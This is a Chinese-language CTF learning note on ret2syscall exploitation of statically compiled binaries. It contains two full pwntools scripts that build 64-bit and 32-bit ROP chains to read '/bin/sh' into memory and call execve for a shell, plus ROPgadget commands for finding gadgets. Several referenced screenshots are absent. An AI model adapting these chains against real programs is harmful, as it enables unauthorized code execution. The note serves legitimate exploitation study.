pwn入门-ret2syscall

静态编译怎么办?如果没system怎么办?

system封装的execve

int execve(const char *filename, char *const argv[], char *const envp[]);

1. filename:包含准备载入当前进程空间的新程序的路径名。既可以是绝对路径，又可以是相对路径。
2. argv[]:指定了传给新进程的命令行参数，该数组对应于c语言main函数的argv参数数组，格式也相同，argv[0]对应命令名，通常情况下该值与filename中的basename(就是绝对路径的最后一个)相同。
3. envp[]:最后一个参数envp指定了新程序的环境列表。参数envp对应于新程序的environ数组。

system不一定能执行，但是execve一定行

alt+T搜索字符串，一定有syscall(静态编译能搜到)

具体原理要看深入理解计算机系统

一般静态编译/bin/sh和sh会有

64位

布栈结构：

没binsh直接截取sh：

这样是不行的，因为syscall走的是绝对路径

可以写入?但是其实这个存储的地址是随机的

这种为0的基本能写：

带align 100%可写，如果对齐，IDE就自动帮我们判断后面的一片空间没有用

这个是syscall的参数

什么意思呢?就是先往0x4AE810写入/bin/sh，写入要用到syscall(因为这里没system，也没有got表能直接调用之类的)，需要先设置rax为0读入，参数是rdi：0，写入地址，rdx写入几位

再下面就是调用的过程了

动调发现没有取得shell，动调发现

程序到这需要输入

输入的有回车可能产生问题，下次试试分号结尾

用了分号也是一样的，还是如下错误，最后听课知道这里还需要SyscallRet，不然无法跳到下面的Syscall

一直ctrl+t

from pwn import *

context(log_level='debug', arch='amd64', os='linux')
pwnfile = './question_5_x64_static'
io = process(pwnfile)
elf = ELF(pwnfile)

padding = 0x10  

gdb.attach(io)

syscall_addr = 0x461405
pop_rax_ret = 0x43efc3
pop_rdi_ret = 0x401741
pop_rsi_ret = 0x407b1e
pop_rdx_ret = 0x40168b
bin_sh_addr = 0x4AE810

payload = b'a' * padding 
payload += flat([pop_rax_ret, 0, pop_rdi_ret, 0, pop_rsi_ret, bin_sh_addr, pop_rdx_ret, 8, syscall_addr])
payload += flat([pop_rax_ret, 0x3b, pop_rdi_ret, bin_sh_addr, pop_rsi_ret, 0, pop_rdx_ret, 0, syscall_addr])

delimiter = 'input:'
io.sendlineafter(delimiter, payload)
pause()
io.send(b'/bin/sh\x00')
io.interactive()

这里有一个非常重要的细节：

必须要有pause，否则 send 的速度非常快，有可能在 syscall 还没完全执行时，/bin/sh\x00 已经被发送了，导致失败

32位

32位的execve在11。且是由中断(int 0x80触发的)

没有ecx,cx也没

ROPgadget –binary question_5_static_x86 | grep ecx | grep mov

0x080929af

一些题目需要注意对齐问题：

ROPgadget –binary question_5_static_x86 –only “int”

0x0804a9b2跟着这个往后搜找ret

int 80h

eax = 3 ，这里的先pop哪个没关系

from pwn import *

context(log_level='debug', arch='i386', os='linux')
pwnfile = './question_5_static_x86'
io = process(pwnfile)
elf = ELF(pwnfile)

padding = 0x10 + 4

gdb.attach(io)

int80_addr = 0x08071FE0
pop_eax_ret = 0x080ae706 
pop_ebx_ret = 0x0804901e
pop_edx_ret = 0x08069ca8
mov_ecx_eax_ret = 0x080929af
bin_sh_addr = 0x080E7EC8

payload = b'a' * padding 
payload += flat([pop_eax_ret, bin_sh_addr, mov_ecx_eax_ret, pop_eax_ret, 3, pop_ebx_ret, 0, pop_edx_ret, 8, int80_addr])
payload += flat([pop_eax_ret, 0, mov_ecx_eax_ret, pop_eax_ret, 11, pop_ebx_ret, bin_sh_addr, pop_edx_ret, 0, int80_addr])

delimiter = 'input:'
io.sendlineafter(delimiter, payload)
pause()
io.send(b'/bin/sh\x00')
io.interactive()

如果不能执行Execve怎么办?

还能用其他的，如open，orw

写和执行一般不会同时存在

ROPgadget –binary xxx –ropchain